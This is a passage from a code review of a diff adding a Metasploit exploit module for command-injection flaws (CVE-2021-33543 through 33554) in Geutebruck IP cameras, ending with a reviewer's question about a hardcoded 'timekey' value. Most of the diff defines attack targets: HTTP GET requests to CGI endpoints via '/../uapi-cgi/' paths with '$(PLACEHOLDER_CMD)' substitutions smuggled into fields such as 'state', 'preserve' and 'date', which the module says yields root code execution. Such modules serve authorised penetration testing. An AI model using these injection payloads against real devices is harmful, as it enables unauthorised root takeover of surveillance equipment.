modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb

```diff
@@ -0,0 +1,186 @@
+          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,
+          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as
+          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in
+          remote code execution as the root user.
+        },
+
+        'Author' => [
+          'Titouan Lazard', # Of RandoriSec - Discovery
+          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
+          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-33543'],
+          ['CVE', '2021-33544'],
+          ['CVE', '2021-33548'],
+          ['CVE', '2021-33550'],
+          ['CVE', '2021-33551'],
+          ['CVE', '2021-33552'],
+          ['CVE', '2021-33553'],
+          ['CVE', '2021-33554'],
+          [ 'URL', 'http://geutebruck.com' ],
+          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
+          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
+        ],
+        'DisclosureDate' => '2021-07-08',
+        'Privileged' => true,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'CVE-2021-33544 - certmngr.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => {
+                'action' => 'createselfcert',
+                'local' => 'a',
+                'country' => 'aa',
+                'state' => '$(PLACEHOLDER_CMD)',
+                'organization' => 'a',
+                'organizationunit' => 'a',
+                'commonname' => 'a',
+                'days' => '1',
+                'type' => 'a'
+              },
+              'uri' => '/../uapi-cgi/certmngr.cgi'
+            }
+          ],
+          [
+            'CVE-2021-33548 - factory.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => { 'preserve' => 'test$(PLACEHOLDER_CMD)' },
+              'uri' => '/../uapi-cgi/factory.cgi'
+            }
+          ],
+          [
+            'CVE-2021-33550 - language.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
+              'uri' => '/../uapi-cgi/language.cgi'
+            }
+          ],
+          [
+            'CVE-2021-33551 - oem.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => {
+                'action' => 'set',
+                'enable' => 'yes',
+                'environment.lang' => '$(PLACEHOLDER_CMD)'
+              },
+              'uri' => '/../uapi-cgi/oem.cgi'
+            }
+          ],
+          [
+            'CVE-2021-33552 - simple_reclistjs.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => {
+                'action' => 'get',
+                'timekey' => '2333',
```

Comment:
Again is `2333` a required value or could we use `Rex::Text.rand_text_numeric(4..6)` here or something similar?